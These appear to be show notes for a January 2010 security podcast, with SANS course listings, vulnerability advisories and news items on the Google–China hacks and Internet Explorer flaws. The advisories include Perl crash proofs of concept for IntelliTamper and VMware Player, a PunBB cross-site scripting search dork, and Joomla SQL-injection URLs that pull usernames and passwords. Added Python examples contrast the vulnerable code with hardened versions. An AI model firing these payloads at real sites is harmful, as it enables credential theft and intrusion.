InfoSec Podcast Episode 53 for January 25, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information-security news, hopefully providing you a few laughs and a little knowledge.
Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.
FORENSICS 606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10
Register online at the SANS website or call (301) 654-SANS (7267).
SANS 2010 Orlando, Fl. March 6 – 15, 2010 (http://www.sans.org/sans-2010/)
Vulnerabilities of Interest:
- IntelliTamper is subject to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. This issue allows remote attackers to execute arbitrary machine code in the context of the application. Failed exploit attempts will likely crash the application, denying service to legitimate users. IntelliTamper 2.07 and 2.08 are vulnerable; other versions may also be affected. Proof-of-concept and exploits are available:
# H0m3 : S3curity-art.com & Google.com
# M4!L : Wizard-skh@hotmail.com & My@hotmail.it
# usage : perl xpl.pl >>xpl.html
# Builds an HTML page whose script attribute holds 3076 'A' bytes, the oversized input that triggers the crash
my $IntelliTamper_html = '<html><head><title>SkuLL-HackeR Home World</title></head><body>' .
'<script defer="' .
"\x41" x 3076 .
'">' .
"</body></html>";
print $IntelliTamper_html;
- PunBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. PunBB 1.3 is vulnerable; other versions may also be affected. Google Dork: inurl: viewtopic.php?pid= Example URL: http://www.sample.com/forum/viewtopic.php?pid=[Xss]
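The PunBB item above comes down to a request parameter being reflected into HTML without encoding. The following is an added example, not PunBB's code, showing that pattern beside its encoded form; the page fragment, the function names and the request value are constructed for the demo.

```python
# Added example, not PunBB's code: a request parameter reflected into HTML
# without encoding, beside the encoded form. The page fragment, function
# names and request value are constructed for the demo.
import html


def topic_link_vulnerable(pid):
    """The flaw: the pid query parameter is placed into the markup unchanged."""
    return '<a href="viewtopic.php?pid=%s">Post %s</a>' % (pid, pid)


def topic_link_encoded(pid):
    """Hardened: encode for the attribute and text contexts (quote=True covers both)."""
    safe = html.escape(pid, quote=True)
    return '<a href="viewtopic.php?pid=%s">Post %s</a>' % (safe, safe)


def topic_link_strict(pid):
    """Tighter still: pid is a post number, so reject anything that is not one before rendering."""
    if not pid.isdigit():
        raise ValueError("pid must be a post number")
    return topic_link_encoded(pid)


# Constructed value standing in for the [Xss] placeholder in the advisory's example URL.
MARKUP_PAYLOAD = '"><b>injected</b>'


def demo():
    """Return what each variant renders for the constructed value and for a normal post number."""
    return {
        "vulnerable": topic_link_vulnerable(MARKUP_PAYLOAD),
        "encoded": topic_link_encoded(MARKUP_PAYLOAD),
        "strict_normal": topic_link_strict("42"),
    }


if __name__ == "__main__":
    for name, markup in demo().items():
        print(name, markup)
```

Encoding at the point of output is what stops the attribute from being closed early; validating that pid is a number is a second, independent line of defence that also keeps junk out of the logs.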
- The ‘com_gameserver’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/component/gameserver/?view=gameserver&grp=-1′+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%2
- The ‘com_gurujibook’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users–
- The JbPublishDownFp component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/administrator/index.php?option=com_jbpublishdownfp&task=edit&cid[]=-1+union+all+select+concat(username,0x3A3A3A,password)+from+jos_users
- The Mochigames component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Example URL: http://www.sample.com/[JOOMLA_PATH]/index.php?view=mochigames&id=99999%27+union+select+1,2,username,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+jos_users%23&option=com_mochigames&Itemid=80
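All four Joomla items share one root cause: a request parameter is pasted into the SQL text, so a UNION clause in that parameter becomes part of the query. The following is an added example, not code from the podcast or from any Joomla component, showing that pattern beside its hardened form against an in-memory SQLite database. The schema, rows, function names and request value are constructed for the demo; only the jos_users table name comes from the advisories.

```python
# Added example, not code from the podcast or any Joomla component: the
# "user-supplied data used directly in an SQL query" flaw behind the Joomla
# advisories, beside its hardened form. Schema, rows, function names and the
# request value are constructed; only the jos_users table name is from the page.
import sqlite3


def make_db():
    """Build an in-memory database with constructed jos_users and jos_books tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE jos_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO jos_users VALUES (62, 'admin', 'constructed-hash');
        CREATE TABLE jos_books (id INTEGER PRIMARY KEY, title TEXT, year INTEGER);
        INSERT INTO jos_books VALUES (1, 'Networking Basics', 2009);
        """
    )
    return conn


def show_pdf_vulnerable(conn, bookid):
    """The flawed pattern: the bookid request parameter is concatenated into the SQL text."""
    sql = "SELECT title, year, id FROM jos_books WHERE id = " + bookid
    return conn.execute(sql).fetchall()


def show_pdf_bound(conn, bookid):
    """Hardened: the value is bound as a parameter, so the driver never parses it as SQL."""
    sql = "SELECT title, year, id FROM jos_books WHERE id = ?"
    return conn.execute(sql, (bookid,)).fetchall()


def show_pdf_hardened(conn, bookid):
    """Hardened plus type validation: bookid is an integer key, so reject anything else up front."""
    if not bookid.isdigit():
        raise ValueError("bookid must be a non-negative integer")
    return show_pdf_bound(conn, int(bookid))


# Constructed request value with the same shape as the advisories' example URLs
# (SQLite has no concat() function, so the || string operator stands in for it).
UNION_PAYLOAD = "-32 UNION ALL SELECT username || ':' || password, 2, 3 FROM jos_users--"


def demo():
    """Return what each variant hands back for a normal id and for the constructed payload."""
    conn = make_db()
    results = {
        "vulnerable_normal": show_pdf_vulnerable(conn, "1"),
        "vulnerable_payload": show_pdf_vulnerable(conn, UNION_PAYLOAD),
        "bound_payload": show_pdf_bound(conn, UNION_PAYLOAD),
        "hardened_normal": show_pdf_hardened(conn, "1"),
    }
    try:
        show_pdf_hardened(conn, UNION_PAYLOAD)
        results["hardened_payload"] = "accepted"
    except ValueError:
        results["hardened_payload"] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

With the bound query the whole payload string is compared against the integer key and simply matches nothing; the concatenated query instead returns a row from jos_users, which is exactly what the example URLs above are built to do. Binding alone closes the hole; the digit check is defence in depth and gives a clean rejection to log.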
- VMware Player is subject to an .m3u skin file local heap overflow.
# By : Pr0f.SeLLiM
VMware Player (.m3u Skin File) Local Heap Overflow PoC
########################
##EBX 41414141
##ESP 0012EF6C
##EBP 00DA50F8 ASCII "C:\Program Files\VMware Player\skins\crash.M3u"
##ESI 0012EFD8
##EDI 014143F8
##EIP 7C90EAF0 ntdll.7C90EAF0
#############################################################
# Writes 5000 'A' bytes to a file; the oversized skin file is what triggers the crash
my $boom = "\x41" x 5000;
my $file = "crash.dat";
open($FILE, ">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";
#####
#####
News Items of Interest:
News item 1: http://news.bbc.co.uk/2/hi/americas/8478005.stm
A Chinese industry ministry spokesman told the state-run Xinhua news agency that claims that Beijing was behind recent cyber attacks were “groundless”. US Secretary of State Hillary Clinton this week asked China to investigate claims by Google that it had been targeted by China-based hackers. The US search giant has threatened to withdraw from China. “The accusation that the Chinese government participated in [any] cyber attack, either in an explicit or inexplicit way, is groundless. We [are] firmly opposed to that,” the unnamed spokesman of China’s ministry of industry and information technology told Xinhua.
“In order to comply with government search warrants on user data, Google created a backdoor access system into Gmail accounts. This feature is what the Chinese hackers exploited to gain access. Google’s system isn’t unique. Democratic governments around the world — in Sweden, Canada and the UK, for example — are rushing to pass laws giving their police new powers of Internet surveillance, in many cases requiring communications system providers to redesign products and services they sell.”
News item 3: http://seclists.org/fulldisclosure/2010/Jan/474
From: Orn Roswell <orn.roswell () gmail com>
Date: Sun, 24 Jan 2010 23:52:27 +0100
Hello,
I am selling IE 8 remote code execution exploit (not patched by the last Microsoft fix). Working under Windows Vista & Windows 7.
Regards,
[ORN ROSWELL]
News item 4: http://www.computerworld.com/s/article/9148138/Researcher_to_reveal_more_Internet_Explorer_problems
Microsoft’s Internet Explorer (IE) could inadvertently allow a hacker to read files on a person’s computer, another problem for the company just days after a serious vulnerability received an emergency patch.
The problem was actually discovered as long as two years ago but has persisted despite two attempts by Microsoft to fix it, said Jorge Luis Alvarez Medina, a security consultant with Core Security Technologies. He is scheduled to give a presentation at the Black Hat conference in Washington, D.C., on Feb. 3.
News item 5: http://news.cnet.com/8301-13772_3-10440819-52.html?part=rss&subj=news&tag=2547-1_3-0-20
Earlier this month, as reported by AVWeb, the U.S. Federal Aviation Administration issued “special conditions” regarding Boeing’s forthcoming 747-8–the next-generation of its iconic 747 line of planes–aimed at making sure that the new plane’s high-tech networking systems are hack proof.
According to the FAA, the 747-8–which should have its first flight any day now, and which is intended to be a much more efficient and powerful version of the 747 than even its most recent models–”will have novel or unusual design features associated with the architecture and connectivity capabilities of the airplane’s computer systems and networks, which may allow access to external computer systems and networks.”